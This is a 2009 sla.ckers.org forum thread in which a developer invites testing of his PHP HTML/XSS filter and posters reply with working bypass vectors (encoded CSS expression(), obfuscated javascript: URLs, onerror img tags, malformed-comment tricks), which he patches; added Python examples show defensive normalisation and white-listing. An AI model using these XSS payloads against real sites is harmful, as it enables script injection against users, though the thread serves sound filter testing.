Sla.ckers.org
Released new secure HTML parser and filter
Posted by: mlemos
Date: August 19, 2009 05:21AM

Hello,

I finally released my secure HTML parser and filter.

It is a bunch of PHP classes that aim to parse and filter insecure HTML mainly to avoid XSS attacks. Below follows a more detailed definition.

The goal of this package is not to compete with existing packages for similar purposes, but rather to address needs that I had and could not be fulfilled by existing solutions.

I am announcing it here mainly to get feedback, in particular about any flaws and XSS attack vectors that the current implementation does not handle properly.

Thank you in advance for your time and patience in evaluating this package.

Manuel Lemos


The package can be downloaded from here:

http://www.phpclasses.org/secure-html-filter

Or pulled from a CVS repository using a command line like this:

cvs -z3 -d :pserver:cvsread@cvs.meta-language.net:/opt2/ena/metal checkout markupparser xmlparser

The validator class caches parsed DTD in local files to avoid DTD file fetching and parsing overhead. It needs a file caching class that currently is only available from here:

http://www.phpclasses.org/filecache

This package can be used to parse and filter insecure HTML tags and CSS styles.

It comes with a general purpose markup parser class that can parse any type of markup documents like HTML, XML and DTD files.

There are several other classes that can be chained together to retrieve the document token elements returned by the main markup parser class and filter the document elements in a useful way.

The markup validator filter class validates a document against a DTD, removing invalid tags and attributes where necessary.

The safe HTML filter class uses several white lists to process HTML tags and data returned by the markup validator class and discards potentially harmful HTML tags and CSS that could be used to perform cross-site scripting (XSS) or cross-site request forgery (CSRF) security attacks.

The filtered HTML tokens can be reassembled to return a well-formed and secure HTML document.

The HTML links filter class can extract the links contained in an HTML document.

The DTD parser and CSS parser are utility classes used by the other classes.

Re: Released new secure HTML parser and filter
Posted by: Gareth Heyes
Date: August 19, 2009 06:11AM

Demo or no dice

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Released new secure HTML parser and filter
Posted by: PaPPy
Date: August 19, 2009 08:52AM

requires 2 other classes which aren't included?

also only tests from
http://www.phpclasses.org/browse/file/28173.html
Definitions for the XSS attack vectors from ha.ckers.org

even though this deals with XSS, shouldn't it be under projects
http://sla.ckers.org/forum/list.php?12

http://www.xssed.com/archive/author=PaPPy/

Re: Released new secure HTML parser and filter
Posted by: thrill
Date: August 19, 2009 09:13AM

Correct PaPPy, moved.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 19, 2009 01:50PM

Gareth, the package comes with a test script named test_safe_html_filter.php that you can use to try it.

The two classes that are not inside the package are not really required, but as I mentioned they may be obtained here:

http://www.phpclasses.org/filecache (This is for caching DTD, although caching is optional)

and

cvs -z3 -d :pserver:cvsread@cvs.meta-language.net:/opt2/ena/metal checkout xmlparser

or

http://www.phpclasses.org/xmlparser (This is only needed for parsing the xssAttacks.xml file)

Just let me know if you have further difficulties testing this package.

Re: Released new secure HTML parser and filter
Posted by: Gareth Heyes
Date: August 19, 2009 02:05PM

So you want me to get an account on phpclasses, then download two classes and install them on a local machine after examining each one for backdoors then find the many holes and post them here?

Jeez I don't fancy your chances :P


Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 20, 2009 05:31AM

Gareth, relax, it would be silly for me to distribute PHP source code with backdoors, especially when it is easy for anybody to read the source.

Anybody that knows me is aware that I am a trustworthy person and I would never do anything like that. But it's OK, I suppose you do not know me and you are not willing to take chances.

Anyway, I just added a page with a form on which you can try any HTML code you want against this package:

http://www.meta-language.net/markupparser/secure_html_filter.html

Keep in mind that this is still a project in beta stage and there are known limitations that will be addressed soon.

For now, I would just appreciate any feedback regarding any XSS attacks that the package is not yet handling properly.

Thanks in advance for your time and patience.

Re: Released new secure HTML parser and filter
Posted by: Gareth Heyes
Date: August 20, 2009 06:10AM

@mlemos

Sorry mate I've been in a bad mood lately, but still I wouldn't trust code from someone without testing it first :P Anyway...bypassed.

<div style=color:&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101&#92&#48&#48&#50&#56&#92&#48&#48&#54&#49&#92&#48&#48&#54&#99&#92&#48&#48&#54&#53&#92&#48&#48&#55&#50&#92&#48&#48&#55&#52&#92&#48&#48&#50&#56&#92&#48&#48&#51&#49&#92&#48&#48&#50&#57&#92&#48&#48&#50&#57></div>


Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 20, 2009 06:19AM

<a href="javas\0cript:alert(1)">x</a>

Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 20, 2009 06:21AM

<a href="j&#x61vascript:prompt(2)">xxx</a>
<a href="&#x09javascript:prompt(2)">xxx</a>
<a href="j&#x00avascript:prompt(2)">xxx</a> //chrome and IE

Tons of variants for this one



Edited 1 time(s). Last edit at 08/20/2009 06:26AM by .mario.

Re: Released new secure HTML parser and filter
Posted by: rvdh
Date: August 20, 2009 06:25AM

I got an account on phpclasses for a very long time, very cool site and very nice people. Come to think about it, me and Manuel had a few chats long time ago. Didn't know it was you Manuel!

Hehe funny.

Re: Released new secure HTML parser and filter
Posted by: sirdarckcat
Date: August 21, 2009 01:30AM

@mario, @gareth

Those are false positives, it CANT be so easy to bypass, it says "secure" in the name.

compatibility = super bad
parser security = super bad

you need to read HTML 2, 4, 5 and CSS 1,2,3 specs, also Unicode of course and do a lot of testing on IE 5,6,7,8 and Firefox 1.5,2,2.5,3,3.5,3.6 and Opera 7,8,9,10 in all their versions (mini, embed, mobile, pc, etc..) Safari/Chrome (webkit mostly all versions) and also have like 2-3 years of experience on internet browsers' quirks and problems before even attempting to make a parser with a "secure" in its name.

My third try to break it, broke it (not to say all the issues you have with compatibility).

<img src=//256"onerror="alert(1)>

nice try..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Released new secure HTML parser and filter
Posted by: thornmaker
Date: August 21, 2009 01:51AM

<img src="http:x" alt='"x=' name=onerror='alert(0)'></img>

IIRC, this will execute in FF2.X: <!--x--x><script>alert(0)</script>-->




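The two start tags above turn on how attribute values are tokenized and, just as much, on how a filter writes them back out. The following is an added example in Python (not the project's PHP, and not code from anyone in this thread): a tokenizer for a single start tag that follows the WHATWG attribute rules, a serializer that double-quotes and escapes every value, and, for contrast, a hypothetical serializer that re-quotes without escaping. The vector strings are constructed copies of the two posts; `SDC_TAG`, `THORN_TAG` and the function names are this example's own.

```python
import re

# Constructed copies of the two start tags posted above (sirdarckcat, thornmaker).
SDC_TAG = '<img src=//256"onerror="alert(1)>'
THORN_TAG = "<img src=\"http:x\" alt='\"x=' name=onerror='alert(0)'>"

_WS = " \t\n\r\f"
# A leading '=' or a quote character is a parse error, but it still starts a name.
_ATTR_NAME = re.compile(r"=[^\s/=]*|[^\s/=]+")
_UNQUOTED = re.compile(r"\S*")


def parse_start_tag(tag):
    """Tokenize one start tag ('<' ... '>') with the WHATWG attribute rules
    that matter here: '/' between attributes is a separator, an unquoted
    value runs to whitespace or '>' and may contain quote characters, and
    the first occurrence of a duplicate attribute wins. Character references
    inside values are left undecoded."""
    assert tag.startswith("<") and tag.endswith(">")
    s = tag[1:-1]
    m = re.match(r"[A-Za-z][^\s/]*", s)
    name, i, attrs = m.group(0).lower(), m.end(), {}
    while i < len(s):
        if s[i] in _WS + "/":
            i += 1
            continue
        m = _ATTR_NAME.match(s, i)
        attr, i, value = m.group(0).lower(), m.end(), ""
        while i < len(s) and s[i] in _WS:
            i += 1
        if i < len(s) and s[i] == "=":
            i += 1
            while i < len(s) and s[i] in _WS:
                i += 1
            if i < len(s) and s[i] in "\"'":
                close = s.find(s[i], i + 1)
                close = len(s) if close < 0 else close
                value, i = s[i + 1:close], close + 1
            else:
                m = _UNQUOTED.match(s, i)
                value, i = m.group(0), m.end()
        attrs.setdefault(attr, value)
    return name, attrs


def escape_attr(value):
    """Escape a value for a double-quoted attribute so it can never close the
    quote or start a new attribute when the browser re-tokenizes the output."""
    return (value.replace("&", "&amp;").replace('"', "&quot;")
                 .replace("<", "&lt;").replace(">", "&gt;"))


def serialize(name, attrs, escape=True):
    """Re-emit a start tag with every value double-quoted. escape=False models
    a hypothetical filter that re-quotes without escaping, for contrast only."""
    parts = [name] + [
        f'{k}="{escape_attr(v) if escape else v}"' for k, v in attrs.items()]
    return "<" + " ".join(parts) + ">"


def roundtrip(tag, escape=True):
    """Attributes the browser sees after the filter has re-serialized the tag."""
    return parse_start_tag(serialize(*parse_start_tag(tag), escape=escape))[1]
```

Parsed by the spec rules, neither posted tag carries an onerror attribute: sirdarckcat's quote characters end up inside the unquoted src value, and thornmaker's `onerror='alert(0)'` is the value of `name`. Both come back to life if the filter re-emits the values inside double quotes without escaping the quotes they contain, which is why the output side of a filter needs the same care as the input side.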
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 21, 2009 02:28AM

Gareth, no problem.

Meanwhile I tackled that case. You may want to try again now.

I think I still need to deal with CSS comments, as they seem to be allowed in the middle of style values.

Re: Released new secure HTML parser and filter
Posted by: thornmaker
Date: August 21, 2009 02:31AM

this definitely works in the latest firefox and bypasses the filter: <!--x--!><script>alert(0)</script>-->

Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 21, 2009 04:17AM

<!--><img/src='-->' onerror=alert(1)//

This works in FF3+ (didn't test 2.x) - don't worry - other well-known HTML filters are being fooled by this one too :)

Re: Released new secure HTML parser and filter
Posted by: sirdarckcat
Date: August 21, 2009 04:57AM

@mario and conditional comments rock even more

btw did you know that ---> is not a valid close-comment on xml? (if it has 3 dashes its invalid)


--edit--
omg, I just tested the <!--> on ff+ my html parser and it works (was filtered correctly on IE {that works on IE too}, but I thought ffx parsed it correctly by the html engine.. I'll be patching this issue on core, just in case any other browsers allow it).





Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 21, 2009 05:45AM

@sdc: Nup didn't know but very interesting! What I do know is that FF is attackers' best friend :)

<!--><iframe/a='-->'onload=alert(1)//

Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 21, 2009 05:18PM

mario, I nailed those vectors with encoded entities in the middle of javascript URLs.

BTW, when you put the vector <a href="javas\0cript:alert(1)">x</a> do you mean that \0 is the NUL character or a backslash character \ followed by the character zero 0 ? I only nailed the first case.

Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 21, 2009 06:57PM

@mlemos I meant nullbytes in general (Chrome, IE8 etc..)

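For the javascript: URL vectors .mario posted above and the NUL-byte question in mlemos's reply, here is an added example in Python (not the project's PHP, and not anyone's code from this thread) of normalising an href before extracting its scheme and checking it against a white list. The vectors are constructed copies from the posts; the white list, the `VECTORS` labels and the function names are this example's own choices, and the normalisation deliberately assumes the most forgiving browser rather than any single one.

```python
import html
import re

# Constructed copies of the href values posted by .mario above, plus the two
# readings of "\0" that mlemos asks about: a real NUL byte and a literal
# backslash followed by a zero.
VECTORS = {
    "entity inside scheme": "j&#x61vascript:prompt(2)",
    "leading tab entity": "&#x09javascript:prompt(2)",
    "NUL entity": "j&#x00avascript:prompt(2)",
    "raw NUL byte": "javas\x00cript:alert(1)",
    "literal backslash zero": "javas\\0cript:alert(1)",
}
SAFE_SCHEMES = {"http", "https", "ftp", "mailto"}   # this example's own white list
_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_IGNORED = re.compile(r"[\x00\t\n\r]")
_SCHEME = re.compile(r"^([^/?#:]*):")


def normalise_url(raw):
    """Rewrite an href/src value into the form the browser dispatches on.

    1. Character references are decoded as the attribute tokenizer does; the
       ';' is optional, so '&#x61' is 'a'. Note the hex run is greedy: in
       'j&#x00avascript' the 'a' is part of the reference, which decodes to a
       line feed, so whatever a given browser does with NUL, what remains
       here is 'jvascript:' and the white list rejects it.
    2. Leading and trailing C0 controls and spaces are removed, and tab, LF
       and CR are removed anywhere, as the browser's URL parser does.
    3. NUL bytes are removed anywhere too, because the browsers named in the
       thread ignored them; a filter has to assume the most forgiving parser.
    """
    url = html.unescape(raw)
    url = _EDGE_CONTROLS.sub("", url)
    return _IGNORED.sub("", url)


def check_url(raw):
    """Return (allowed, scheme). Scheme-less (relative) URLs are allowed; any
    scheme not on the white list is rejected, so the filter never has to
    enumerate javascript:, vbscript:, data: or whatever comes next. A literal
    backslash-zero scheme is rejected for the same reason, without needing to
    know whether any browser would run it."""
    url = normalise_url(raw)
    m = _SCHEME.match(url)
    if m is None:
        return True, None
    scheme = m.group(1).lower()
    return scheme in SAFE_SCHEMES, scheme


def report():
    """Decision for every posted vector, keyed by the labels above."""
    return {label: check_url(value) for label, value in VECTORS.items()}
```

The point of the white list is that the decision never depends on recognising `javascript` in some mangled form: a scheme is either one of a handful of known-good names after normalisation, or the attribute is dropped.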
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 03:20AM

rvdh, a lot of people went to the PHPClasses site, if not to use stuff available there, at least to research existing solutions for their purposes.

I just would not guess who you are because your alias rvdh does not ring any bells to me. Maybe if you tell me your real name, I may remember! ;-)

Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 03:25AM

thornmaker, I just nailed that end comment variant and updated the test site.

Anyway, it is a bit odd. The HTML documentation says SGML comments may end with -- followed possibly by whitespace before the > . So maybe I should also consider that possibility.

However, adding whitespace between -- and > does not make at least Firefox treat it as end comment, but using a ! does it. Is this something defined in any standard or a Firefox quirk? Did you find this out by yourself or you read somewhere?

Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 05:57AM

Ok, I think I nailed all the vectors presented so far. Please check them again in the test page and let me know of any other vectors you find that it fails on.

Re: Released new secure HTML parser and filter
Posted by: Anonymous User
Date: August 22, 2009 12:45PM

<!--><img src="x->" onerror=alert(1)//<!-->-->

Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 22, 2009 03:41PM

mario, that vector was already handled. If you try it, you may see that the class closes the img tag and the onerror attribute becomes data.

At most what I can do better with that case is to encode the " character that was moved to data, but that is harmless.

Re: Released new secure HTML parser and filter
Posted by: thornmaker
Date: August 22, 2009 05:37PM

mlemos Wrote:
-------------------------------------------------------
> thornmaker, I just nailed that end comment variant
> and updated the test site.
>
> Anyway, it is a bit odd. The HTML documentation
> says SGML comments may end with -- followed
> possibly by whitespace before the > . So maybe I
> should also consider that possibility.
>
> However, adding whitespace between -- and > does
> not make at least Firefox treat it as end comment,
> but using a ! does it. Is this something defined
> in any standard or a Firefox quirk? Did you find
> this out by yourself or you read somewhere?


If I recall correctly, while reading about HTML5 I saw something about --!> being allowed to close comments (I can't find any references to this now though). I had not tried this specific one until couple of nights ago. At least some versions of Firefox 2.X allowed arbitrary text between the -- and the > in order to close a html comment (not just a single char or white space). See http://sla.ckers.org/forum/read.php?3,12323#msg-12344 for a discussion on this. I don't have any firefox 2.X to test with right now though.

Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 23, 2009 04:03AM

thornmaker, you are right. I think it is safer to consider that a comment ends after the -- and > characters even if there are any characters in between. I just nailed that vector now.

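The comment vectors in this thread (`<!-->` followed by a tag, `--!>`, and the `--x>` case thornmaker remembers from Firefox 2) all exploit the gap between where a filter thinks a comment ends and where the browser does. The following is an added example in Python, not the project's PHP and not code from anyone in this thread: a comment splitter that can run either the naive `<!--` ... `-->` rule or the WHATWG tokenizer's end-of-comment rules, so the two views can be compared on the posted vectors. The vector strings are constructed copies; the names are the example's own. It encodes the current WHATWG rules, not Firefox 2 behaviour, which is one more reason a filter should drop comments entirely at the browser's boundaries rather than pass them through.

```python
import re

# Constructed copies of the vectors posted above (.mario and thornmaker).
EMPTY_COMMENT_IMG = "<!--><img/src='-->' onerror=alert(1)//"
BANG_CLOSE = "<!--x--!><script>alert(0)</script>-->"
DOUBLE_EMPTY = '<!--><img src="x->" onerror=alert(1)//<!-->-->'
DASH_X_CLOSE = "<!--x--x><script>alert(0)</script>-->"

_ABRUPT = re.compile(r"-?>")       # '<!-->' and '<!--->' are complete, empty comments
_HTML5_END = re.compile(r"--!?>")  # '-->' closes; so does '--!>' (a parse error, but it closes)
_NAIVE_END = re.compile(r"-->")


def split_comments(doc, rule="html5"):
    """Split doc into ('comment', body) and ('markup', text) tokens.

    rule='naive' is the shortcut many filters take: a comment runs from
    '<!--' to the next '-->'. rule='html5' follows the WHATWG tokenizer:
    '<!-->' and '<!--->' are empty comments, '--!>' ends a comment, and
    '-- >' or '--x>' do not. An unterminated comment swallows the rest under
    both rules. Only comment boundaries are tokenized here, not tags."""
    tokens, pos = [], 0
    while True:
        start = doc.find("<!--", pos)
        if start < 0:
            break
        if start > pos:
            tokens.append(("markup", doc[pos:start]))
        body = start + 4
        if rule == "html5":
            abrupt = _ABRUPT.match(doc, body)
            if abrupt:
                tokens.append(("comment", ""))
                pos = abrupt.end()
                continue
        end = (_HTML5_END if rule == "html5" else _NAIVE_END).search(doc, body)
        if end is None:
            tokens.append(("comment", doc[body:]))
            return tokens
        tokens.append(("comment", doc[body:end.start()]))
        pos = end.end()
    if pos < len(doc):
        tokens.append(("markup", doc[pos:]))
    return tokens


def markup_seen(doc, rule="html5"):
    """The text a parser following `rule` hands on to the tag tokenizer. With
    rule='html5' this is also the safest filter output: comments are gone and
    nothing that was inside one can resurface as a tag in the browser."""
    return "".join(text for kind, text in split_comments(doc, rule) if kind == "markup")
```

On `<!--><img/src='-->' onerror=alert(1)//` the naive rule sees one comment and the harmless text `' onerror=alert(1)//`; the browser sees an empty comment followed by a complete `<img>` tag with an onerror handler. The `--!>` vector is the mirror image: the naive rule keeps reading until the final `-->`, the browser stops at `--!>` and parses the script tag. Ending a comment on any `--...>`, as mlemos decides above, errs in the safe direction (the filter closes no later than the browser), but it does not cover `<!-->`, which needs the abrupt-close rule.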
Re: Released new secure HTML parser and filter
Posted by: sirdarckcat
Date: August 24, 2009 09:35AM

<h1 style="color:url(&#x27;&#x22;javascript:alert(/good luck next time/)&#x22;&#x27;);"></h1>


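Gareth Heyes's entity-encoded CSS escape vector (posted earlier in the thread) and sirdarckcat's url() vector above both beat a check that looks at the raw style value. The following is an added example in Python (not the project's PHP, and not code from anyone in this thread) that decodes a style attribute the way the browser will, CSS escapes and comments included, and only then applies property and URL-scheme white lists. The two style strings are constructed copies from the posts; the white lists, the script-hook list and the function names are this example's own and deliberately small.

```python
import html
import re

# Constructed copies of the two style values posted in this thread (Gareth Heyes,
# then sirdarckcat); the surrounding <div>/<h1> tags are not needed here.
GARETH_STYLE = (
    "color:&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50"
    "&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57"
    "&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101&#92&#48&#48&#50&#56&#92&#48&#48&#54&#49"
    "&#92&#48&#48&#54&#99&#92&#48&#48&#54&#53&#92&#48&#48&#55&#50&#92&#48&#48&#55&#52"
    "&#92&#48&#48&#50&#56&#92&#48&#48&#51&#49&#92&#48&#48&#50&#57&#92&#48&#48&#50&#57"
)
SDC_STYLE = "color:url(&#x27;&#x22;javascript:alert(/good luck next time/)&#x22;&#x27;);"

# This example's own white lists; a real deployment would tune them.
SAFE_PROPERTIES = {"color", "background-color", "background-image",
                   "font-size", "font-weight", "text-align", "text-decoration"}
SAFE_URL_SCHEMES = {"http", "https"}
SCRIPT_HOOKS = ("expression(", "-moz-binding", "behavior", "@import")
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)", re.S)
_CSS_URL = re.compile(r"url\(\s*([^)]*?)\s*\)", re.I)
_CONTROLS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def decode_style(style):
    """Reduce a style attribute value to what the CSS engine will run.

    1. The HTML attribute tokenizer decodes character references, with or
       without a terminating ';' (so '&#92' is a backslash).
    2. The CSS tokenizer drops /* comments */ (mlemos notes above that they
       are legal in the middle of a value) and decodes backslash escapes:
       1-6 hex digits plus one optional whitespace, or any other single char.
    3. Leftover control characters are removed and whitespace collapsed.
    """
    text = html.unescape(style)
    text = _CSS_COMMENT.sub("", text)

    def unescape(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return "\ufffd" if cp == 0 or cp > 0x10FFFF else chr(cp)
        return m.group(2)

    text = _CSS_ESCAPE.sub(unescape, text)
    text = _CONTROLS.sub("", text)
    return re.sub(r"\s+", " ", text).strip()


def url_scheme(url_arg):
    """Scheme of a url() argument, or None if it is relative. Quotes,
    whitespace and control characters are removed first, because the
    browser discards them before it looks at the scheme, which is exactly
    what the '"javascript:' trick relies on."""
    cleaned = re.sub(r"[\"'\s\x00-\x1f]", "", url_arg)
    head, sep, _ = cleaned.partition(":")
    return head.lower() if sep else None


def filter_style(style):
    """Keep only declarations whose property is white-listed, whose decoded
    value carries no script hook, and whose url() arguments use a white-listed
    scheme (relative URLs pass). The output is re-serialised from the decoded
    form, so no encoding trick survives into the page."""
    kept = []
    for decl in decode_style(style).split(";"):
        prop, sep, value = decl.partition(":")
        prop, value = prop.strip().lower(), value.strip()
        if not sep or prop not in SAFE_PROPERTIES:
            continue
        low = value.lower()
        if any(hook in low for hook in SCRIPT_HOOKS):
            continue
        schemes = [url_scheme(u) for u in _CSS_URL.findall(value)]
        if any(s is not None and s not in SAFE_URL_SCHEMES for s in schemes):
            continue
        kept.append(f"{prop}:{value}")
    return ";".join(kept)
```

Decoded, Gareth's value is plainly `color:expression(alert(1))`, and sirdarckcat's is `url('"javascript:...')`, where the quote characters in front of the scheme are what a naive "starts with a known scheme" check trips over. Checking after decoding, and against white lists rather than a list of bad strings, handles both without a special case for either.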
Re: Released new secure HTML parser and filter
Posted by: mlemos
Date: August 27, 2009 01:09PM

sirdarckcat, unsafe URL checking was just fixed to properly determine URL schemes before checking against the white list.
